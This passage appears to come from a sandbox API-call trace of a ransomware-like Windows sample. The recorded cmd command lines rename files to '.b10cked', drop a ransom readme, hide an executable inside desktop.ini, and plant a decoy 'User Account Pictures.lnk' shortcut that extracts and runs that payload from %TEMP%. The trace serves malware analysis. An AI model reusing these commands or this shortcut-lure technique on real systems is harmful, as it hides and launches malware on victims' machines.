lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0192.481] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0192.481] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0192.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="guest.bmp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0192.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="guest.bmp", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="guest.bmp", lpUsedDefaultChar=0x0) returned 9 [0192.485] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc038 [0192.485] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0192.485] CloseHandle (hObject=0x120) returned 1 [0192.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp") returned 0x2d [0192.487] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0192.487] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xaa4, dwThreadId=0xb2c)) returned 1 [0192.495] CloseHandle (hObject=0x1b4) returned 1 [0192.495] CloseHandle (hObject=0x120) returned 1 [0192.495] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0192.495] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0192.496] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount1=51, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 1 [0192.496] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0192.496] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0192.496] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0192.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0192.496] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0192.496] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0192.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0192.496] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0192.496] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0192.497] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf54, dwThreadId=0x994)) returned 1 [0192.502] CloseHandle (hObject=0x1b4) returned 1 [0192.502] CloseHandle (hObject=0x120) returned 1 [0192.502] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\bl0cked-readme.rtf")) returned 0xffffffff [0192.502] GetLastError () returned 0x2 [0192.502] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0192.506] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\bl0cked-readme.rtf")) returned 0x2020 [0192.506] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0192.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0192.506] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0192.506] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0192.506] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0192.507] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0192.507] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0192.507] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0192.507] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0192.507] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0192.507] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1") returned 0x23 [0192.508] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0192.508] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0192.508] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa84, dwThreadId=0xb64)) returned 1 [0192.555] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0193.376] CloseHandle (hObject=0x120) returned 1 [0193.376] CloseHandle (hObject=0x1b4) returned 1 [0193.376] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.377] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0193.377] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0193.377] GetTickCount () returned 0x36f26 [0193.377] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=25016625348) returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0193.377] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0193.378] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0193.378] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0193.378] CharUpperBuffW (in: lpsz="explorer.exe \"User Account Pictures\" & type \"User Account Pictures\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x7b | out: lpsz="EXPLORER.EXE \"USER ACCOUNT PICTURES\" & TYPE \"USER ACCOUNT PICTURES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x7b [0193.378] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0193.378] CharUpperBuffW (in: lpsz="explorer.exe \"User Account Pictures\" & type \"User Account Pictures\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x7c | out: lpsz="EXPLORER.EXE \"USER ACCOUNT PICTURES\" & TYPE \"USER ACCOUNT PICTURES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x7c [0193.378] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0193.378] CoInitialize (pvReserved=0x0) returned 0x0 [0193.378] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0193.380] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0193.380] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0193.380] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0193.382] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"User Account Pictures\" & type \"User Account Pictures\\desktop.ini\" > \"%TEMP%\\clspquze.exe\" && \"%TEMP%\\clspquze.exe\"") returned 0x0 [0193.382] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0193.382] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0193.382] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0193.383] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures.lnk", fRemember=0) returned 0x0 [0193.446] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0193.446] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0193.446] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0193.446] CoUninitialize () [0193.446] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.446] ReleaseMutex (hMutex=0xf8) returned 1 [0193.446] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.447] ReleaseMutex (hMutex=0xf8) returned 1 [0193.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.447] ReleaseMutex (hMutex=0xf8) returned 1 [0193.447] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0193.447] ReleaseMutex (hMutex=0xf8) returned 1 [0193.447] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25023624464) returned 1 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc038 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.447] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0193.448] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 